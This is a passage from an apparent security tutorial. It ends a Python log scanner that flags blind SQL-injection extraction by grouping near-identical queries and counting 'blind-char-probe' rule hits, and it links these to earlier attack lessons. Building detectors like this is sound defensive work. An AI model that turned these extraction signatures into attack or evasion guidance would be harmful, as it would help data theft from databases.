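            rules[client].update(labels)
            # Blind extraction repeats one query and changes only the numbers,
            # so replacing digit runs with N groups those requests together.
            shapes[client][re.sub(r"\d+", "N", query.lower())] += 1
    return {c: {"rules": dict(rules[c]), "max_repeat": max(shapes[c].values())}
            for c in rules}


if __name__ == "__main__":
    for client, info in scan(SAMPLE_LOG).items():
        print(client, info)
```

A high `max_repeat` together with `blind-char-probe` hits is the request-volume signal that the 130-attempt lessons produce; the other styles show up in one or two requests and are caught by the pattern rules alone.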